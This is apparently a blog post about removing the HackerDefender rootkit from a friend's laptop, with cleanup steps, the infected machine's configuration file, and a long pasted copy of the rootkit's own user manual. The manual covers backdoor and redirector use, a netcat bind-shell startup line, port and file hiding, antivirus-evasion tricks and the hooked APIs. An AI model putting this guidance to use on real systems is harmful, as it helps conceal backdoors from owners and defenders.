A friend’s (Phil Kerkel) laptop recently got infected with HackerDefender which cost him about a day’s worth of work. Now this seems to be harmless, but something like this invading the system is scary, especially when you have all your data and not to mention in most cases a lot of our client’s data!

Basically, these guys use the FTP services installed on Windows machines running on high speed networks (such as DSL/Cable, or University campuses) to they can use that fat pipe to distribute copyrighted material such as films, games and software etc. Sometimes these ftp servers are protected by a piece of software called HackerDefender, this software is used to hide files, processes and even ports from the user and investigating parties and is particularly difficult to infiltrate.

Detecting It - If a remote port scan says that a port is open and that port can be ftp’d into but aports ( http://bagpuss.swan.ac.uk/comms/aports.exe ) does not display the port locally you can pretty much assume a version of HackerDefender is installed.

How to Clean It:

Boot windows into Rescue mode, do one of the following:

Insert the Windows OS Installation CD into the Drive.

  • Boot from the CD
  • Choose ‘R’ to enter the Rescue Console
  • Choose the Windows installation you want to Clean from the list presented to you.
  • Enter the Administrator Password.

Once in the recovery console, you have a few commands for this, including:

listsvc    - lists services that can be enabled or disabled

enable - enables a service, with a service type,

  • SERVICE_DISABLED
  • SERVICE_BOOT_START
  • SERVICE_SYSTEM_START
  • SERVICE_AUTO_START
  • SERVICE_DEMAND

disable - disables a service, but prints out the previous

start-type, which should be recorded in case you need to re-enable the service.

Clean up Trojans/payloads protected by HackerDefender:

Once the machine has rebooted search the registry for the name of the service that you disabled in the previous section, this should lead you to the executable for HackerDefender and more importantly it’s .ini file (not necessarily a .ini file, but may have a different extension)

Open/Edit the ini file and in there you should find a number of files, ports and services that HackerDefender is defending.  Systematically find each of these services in the registry and delete them (they will probably appear more than once), likewise find all of the referenced files and delete them also.

It’s also worth having a look in the registry for ‘run on boot’ programs too, goto this key…HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Have a look for any of these and delete them if they are present…

  • “spoolsvr.exe”=-

  • “Kernel32”=-

  • “GLSetIT32”=-

  • “iTouch.exe”=-

  • “Localsys.exe”=-

  • “explorer.exe”=-

  • “msiexe.exe”=-

  • “service”=-

Here is the .ini file from Phil (he was Win2K running), as you scan this you will see more things you should look out for:

[Hidden Table]
inatjoy.dll
motkrtin.dll
witadr.dll
winunins.exe
winunins.ini
svhost.exe
CWShredder*
HijackThis*
ProceXP*
Spybot*
msconfig*

[Root Processes]
svhost.exe
trj4j6js.exe
winunins.exe

[Hidden Services]
HackerDefender*

[Hidden RegKeys]
HackerDefender100
LEGACY_HACKERDEFENDER100
HackerDefenderDrv100
LEGACY_HACKERDEFENDERDRV100

[Hidden RegValues]

[Startup Run]
C:\WINNT\svhost.exe -sr -0

[Free Space]

[Hidden Ports]

[Settings]
Password=qweqwe
BackdoorShell=ddd.exe
FileMappingName=_.-=[PokuS]=-._
ServiceName=HackerDefender100
ServiceDisplayName=Windows System Uninstaller
ServiceDescription=Microsoft System Service
DriverName=HackerDefenderDrv100
DriverFileName=hxdefdrv.sys

[Comments]

The COOL Stuff:

Now, this is the cool part. I found this from another site and don’t want to link to them because who knows they they are running, so this is essentially a copy and paste from them! This is basically how the Trojan works, and it is showing what exploits it used, what API’s and how you can “improve on it“. A very interesting read, but I would recommend not using any of this for other than your own learning!

Essentially everything below is copy and paste with very minor edits:

=====[ 2. Introduction ]=====================================

Hacker defender (hxdef) is rootkit for Windows NT 4.0, Windows 2000 and Windows XP, it may also work on latest NT based systems. Main code is written in Delphi 6. New functions are written in assembler. Driver code is written in C. Backdoor and redirector clients are coded mostly in Delphi 6.

program uses adapted LDE32
LDE32, Length-Disassembler Engine, 32-bit, (x) 1999-2000 Z0MBiE
special edition for REVERT tool
version 1.05

program uses Superfast/Supertiny Compression/Encryption library
Superfast/Supertiny Compression/Encryption library.
(c) 1998 by Jacky Qwerty/29A.

=====[ 2.1 Idea ]=====================================

The main idea of this program is to rewrite few memory segments in all running processes. Rewriting of some basic modules cause changes in processes behaviour. Rewriting must not affect the stability of the system or running processes.

Program must be absolutely hidden for all others. Now the user is able to hide files, processes, system services, system drivers, registry keys and values, open ports, cheat with free disk space. Program also masks its changes  in memory and hiddes handles of hidden processes. Program installs hidden backdoors, register as hidden system service and installs hidden system driver. The technology of backdoor allowed to do the implantation of redirector.

=====[ 2.2 Licence ]=====================================

This project in version 1.0.0 is open source.

And of course authors are not responsible for what you’re doing with  Hacker defender.

=====[ 3. Usage ]=====================================

Usage of hxdef is quite simple:

hxdef100.exe [inifile]
or
 >hxdef100.exe [switch]

Default name for inifile is EXENAME.ini where EXENAME is the name of executable of main program without extension. This is used if you run hxdef without specifying the inifile or if you run it with switch (so default inifile is hxdef100.ini).

These switches are available:

-:installonly - only install service, but not run
 -:refresh - use to update settings from inifile
 -:noservice - doesn’t install services and run normally
 -:uninstall - removes hxdef from the memory and kills all
    running backdoor connections
    stopping hxdef service does the same now

Example:
 >;hxdef100.exe -:refresh

Hxdef with its default inifile is ready to run without any change in inifile. But it’s highly recommended to create your own settings. See Inifile section for more information about inifile.

Switches -:refresh and -:uninstall can be called only from original exefile. This mean you have to know the name and path of running hxdef exefile to change settings or to uninstall it.

=====[ 4. Inifile ]=====================================

Inifile must contain nine parts: [Hidden Table], [Root Processes], [Hidden Services], [Hidden RegKeys], [Hidden RegValues], [Startup Run], [Free Space], [Hidden Ports] and [Settings].  In [Hidden Table], [Root Processes], [Hidden Services] a [Hidden RegValues] can be used character * as the wildcard in place of strings end.

Asterisk can be used only on strings end, everything after first asterisks is ignored. All spaces before first and after last another string characters are ignored.

Example:
[Hidden Table]
hxdef*

this will hide all files, dirs and processes which name start with “hxdef”.

Hidden Table is a list of files, directories and processes which should be hidden. All files and directories in this list will disappear from file managers. Programs in this list will be hidden in tasklist. Make sure main
file, inifile, your backdoor file and driver file are mentioned in this list.

Root Processes is a list of programs which will be immune against infection. You can see hidden files, directories and programs only with these root programs. So, root processes are for rootkit admins. To be mentioned in Root Processes doesn’t mean you’re hidden. It is possible to have root process which is not hidden and vice versa.

Hidden Services is a list of service and driver names which will be hidden in the database of installed services and drivers. Service name for the main rootkit program is HackerDefender100 as default, driver name for the main rootkit driver is HackerDefenderDrv100. Both can be changed in the inifile.

Hidden RegKeys is a list of registry keys which will be hidden. Rootkit has four keys in registry: HackerDefender100, LEGACY_HACKERDEFENDER100, HackerDefenderDrv100, LEGACY_HACKERDEFENDERDRV100 as default. If you rename service name or driver name you should also change this list.

First two registry keys for service and driver are the same as its name. Next two are LEGACY_NAME. For example if you change your service name to BoomThisIsMySvc your registry entry will be LEGACY_BOOMTHISISMYSVC.

Hidden RegValues is a list of registry values which will be hidden.

Startup Run is a list of programs which rootkit run after its startup. These programs will have same rights as rootkit. Program name is divided from its arguments with question tag. Do not use " characters. Programs will terminate after user logon. Use common and well known methods for starting programs after user logon. You can use following shortcuts here:
 %cmd%  - stands for system shell exacutable + path
     (e.g. C:\winnt\system32\cmd.exe)
 %cmddir% - stands for system shell executable directory
     (e.g. C:\winnt\system32\)
 %sysdir% - stands for system directory
     (e.g. C:\winnt\system32\)
 %windir% - stands for Windows directory
     (e.g. C:\winnt\)
 %tmpdir% - stands for temporary directory
     (e.g. C:\winnt\temp\)

Example:
1)
[Startup Run]
c:\sys\nc.exe?-L -p 100 -t -e cmd.exe

netcat-shell is run after rootkit startup and listens on port 100

[Startup Run]
%cmd%?/c echo Rootkit started at %TIME%» %tmpdir%starttime.txt

this will put a time stamp to temporary_directory\starttime.txt (e.g. C:\winnt\temp\starttime.txt) everytime rootkit starts(%TIME% works only with Windows 2000 and higher)

Free Space is a list of harddrives and a number of bytes you want to add to a free space. The list item format is X:NUM where X stands for the drive letter and NUM is the number of bytes that will be added to its number of free bytes.

Example:
[Free Space]
C:123456789

this will add about 123 MB more to shown free disk space of disk C

Hidden Ports is a list of open ports that you want to hide from applications like OpPorts, FPort, Active Ports, Tcp View etc. It has at most 2 lines. First line format is TCP:tppport1, tcpport2, tcpport3 …, second line format is UDP:udpport1,udpport2,udpport3 …

Example:
1)
[Hidden Ports]
TCP:8080,456

this will hide two ports: 8080/TCP and 456/TCP

[Hidden Ports]
TCP:8001
UDP:12345

this will hide two ports: 8001/TCP and 12345/UDP

[Hidden Ports]
TCP:
UDP:53,54,55,56,800

this will hide five ports: 53/UDP, 54/UDP, 55/UDP, 56/UDP and 800/UDP

Settings contains eigth values:Password, BackdoorShell, FileMappingName, ServiceName, ServiceDisplayName, ServiceDescription, DriverName and DriverFileName.

Password which is 16 character string used when working with backdoor or redirector. Password can be shorter, rest is filled with spaces.

BackdoorShell is name for file copy of the system shell which is created by backdoor in temporary directory.

FileMappingName is the name of shared memory where the settings for hooked processes are stored.

ServiceName is the name of rootkit service. ServiceDisplayName is display name for rootkit service.

ServiceDescription is description for rootkit service. DriverName is the name for hxdef driver.

DriverFileName is the name for hxdef driver file.

Example:
[Settings]
Password=hxdef-rulez
BackdoorShell=hxdefá$.exe
FileMappingName=_.-=[Hacker Defender]=-._
ServiceName=HackerDefender100
ServiceDisplayName=HXD Service 100
ServiceDescription=powerful NT rootkit
DriverName=HackerDefenderDrv100
DriverFileName=hxdefdrv.sys
 
This mean your backdoor password is “hxdef-rulez”, backdoor will copy system shell file (usually cmd.exe) to “hxdefá$.exe” to temp. Name of shared memory will be “_.-=[Hacker Defender]=-._”. Name of a service is “HackerDefender100”, its display name is “HXD Service 100”, its description is “poweful NT rootkit”.
Name of a driver is “HackerDefenderDrv100”. Driver will be stored in a file called “hxdefdrv.sys”.

Extra characters |, <, >, :, \, / and " are ignored on all lines except [Startup Run], [Free Space] and [Hidden Ports] items and values in [Settings] after first = character. Using extra characters you can make your inifile immune from antivirus systems.

Example:
[H«>a/“ble]
>h"xdef”*

is the same as

[Hidden Table]
hxdef*

see hxdef100.ini and hxdef100.2.ini for more examples

All strings in inifile except those in Settings and Startup Run are case insensitive.

=====[ 5. Backdoor ]=====================================

Rootkit hooks some API functions connected with receiving packets from the net. If incoming data equals to 256 bits long key, password and service are verified, the copy of a shell is created in a temp, its
instance is created and next incoming data are redirected to this shell.

Because rootkit hooks all process in the system all TCP ports on all servers will be backdoors. For example, if the target has port 80/TCP open for HTTP, then this port will also be available as a backdoor. Exception here is for ports opened by System process which is not hooked. This backdoor will
works only on servers where incoming buffer is larger or equal to 256 bits. But this feature is on almost all standard servers like Apache, IIS, Oracle.

Backdoor is hidden because its packets go through common servers on the system. So, you are not able to find it with classic portscanner and this backdoor can easily go through firewall. Exception in this are classic proxies which are protocol oriented for e.g. FTP or HTTP.

During tests on IIS services was found that HTTP server does not log any of this connection, FTP and SMTP servers log only disconnection at the end. So, if you run hxdef on server with IIS web server, the HTTP port is probably the best port for backdoor connection on this machine.

You have to use special client if want to connect to the backdoor. Program bdcli100.exe is used for this.

Usage: bdcli100.exe host port password

Example:
 >bdcli100.exe www.windowsserver.com 80 hxdef-rulez

this will connect to the backdoor if you rooted www.windowsserver.com before and left default hxdef password.

Client for version 1.0.0 is not compatible with servers in older version.

=====[ 5.1 Redirector ]=====================================

Redirector is based on backdoor technology. First connection packets are same as in backdoor connection. That mean you use same ports as for backdoor. Next packets are special packets for redirector only. These packets are made by redirectors base which is run on users computer. First packet of redirected connection defines target server and port.

The redirectors base saves its settings into its inifile which name depends on base exefile name (so default is rdrbs100.ini). If this file doesn’t exist when base is run, it is created automatically. It is better not to modify this inifile externaly. All settings can be changed from base console.

If we want to use redirector on server where rootkit is installed, we have to run redirectors base on localhost before. Then in base console we have to create mapped port routed to server with hxdef. Finally we can connect on localhost base on chosen port and transfering data. Redirected data are
coded with rootkit password. In this version connection speed is limited with about 256 kBps. Redirector is not determined to be used for hispeed connections in this version. Redirector is also limited with system where rootkit run. Redirector works with TCP protocol only.

In this version the base is controled with 19 commands. These are not case sensitive. Their function is described in HELP command. During the base startup are executed commands in startup-list. Startup-list commands are edited with commands which start with SU.

Redirector differentiate between two connection types (HTTP and other). If connection is other type packets are not changed. If it is HTTP type Host parametr in HTTP header is changed to the target server. Maximum redirectors count on one base is 1000.

Redirector base fully works only on NT boxes. Only on NT program has tray icon and you can hide console with HIDE command. Only on NT base can be run in silent mode where it has no output, no icon and it does only commands in startup-list.

Examples:

  1. getting mapped port info

MPINFO
 No mapped ports in the list.

  1. add command MPINFO to startup-list and get startup-list commands:

SUADD MPINFO
 >sulist
 0) MPINFO

  1. using of HELP command:

HELP
 Type HELP COMMAND for command details.
 Valid commands are:
 HELP, EXIT, CLS, SAVE, LIST, OPEN, CLOSE, HIDE, MPINFO, ADD, DEL,
 DETAIL, SULIST, SUADD, SUDEL, SILENT, EDIT, SUEDIT, TEST
 >HELP ADD
 Create mapped port. You have to specify domain when using HTTP type.
 usage: ADD <TARGET
 SERVER> [TYPE] [DOMAIN]
 >HELP EXIT
 Kill this application. Use DIS flag to discard unsaved data.
 usage: EXIT [DIS]

  1. add mapped port, we want to listen on localhost on port 100, rootkit is installed on server 200.100.2.36 on port 80, target server is www.google.com on port 80, rootkits password is bIgpWd, connection type is HTTP, ip address of target server ( www.google.com ) - we always have to know its ip - is 216.239.53.100:

ADD 100 200.100.2.36 80 216.239.53.100 80 bIgpWd HTTP www.google.com

command ADD can be run without parameters, in this case we are asked for every parameter separately

  1. now we can check mapped ports again with MPINFO:
     
     >MPINFO
     There are 1 mapped ports in the list. Currently 0 of them open.

  2. enumeration of mapped port list:

LIST
 000) 💯200.100.2.36:80:216.239.53.100:80:bIgpWd:HTTP

  1. datailed description of one mapped port:
     
     >DETAIL 0
     Listening on port: 100
     Mapping server address: 200.100.2.36
     Mapping server port: 80
     Target server address: 216.239.53.100
     Target server port: 80
     Password: bIgpWd
     Port type: HTTP
     Domain name for HTTP Host: www.google.com
    Current state: CLOSED

  2. we can test whether the rootkit is installed with out password on mapping
    server 200.100.2.36 (but this is not needed if we are sure about it):

TEST 0
 Testing 0) 200.100.2.36:80:bIgpWd - OK

if test failed it returns
 
 Testing 0) 200.100.2.36:80:bIgpWd - FAILED

  1. port is still closed and before we can use it, we have to open it with OPEN command, we can close port with CLOSE command when it is open, we can use flag ALL when want to apply these commands on all ports in the list, current state after required action is written after a while:
     
     >OPEN 0
     Port number 0 opened.
     >CLOSE 0
     Port number 0 closed.

or

OPEN ALL
 Port number 0 opened.
 

  1. to save current settings and lists we can use SAVE command, this saves all to inifile (saving is also done by command EXIT without DIS flag):
     
     >SAVE
     Saved successfully.

Open port is all what we need for data transfer. Now you can open your favourite explorer and type http://localhost:100/ as url. If no problems you will see how main page on www.google.com is loaded.

First packets of connection can be delayed up to 5 seconds, but others are limited only by speed of server, your internet connection speed and by redirector technology which is about 256 kBps in this version.

=====[ 6.2 Hooked API ]=====================================

List of API functions which are hooked:

Kernel32.ReadFile
Ntdll.NtQuerySystemInformation (class 5 a 16)
Ntdll.NtQueryDirectoryFile
Ntdll.NtVdmControl
Ntdll.NtResumeThread
Ntdll.NtEnumerateKey
Ntdll.NtEnumerateValueKey
Ntdll.NtReadVirtualMemory
Ntdll.NtQueryVolumeInformationFile
Ntdll.NtDeviceIoControlFile
Ntdll.NtLdrLoadDll
Ntdll.NtOpenProcess
Ntdll.NtCreateFile
Ntdll.NtLdrInitializeThunk
WS2_32.recv
WS2_32.WSARecv
Advapi32.EnumServiceGroupW
Advapi32.EnumServicesStatusExW
Advapi32.EnumServicesStatusExA
Advapi32.EnumServicesStatusA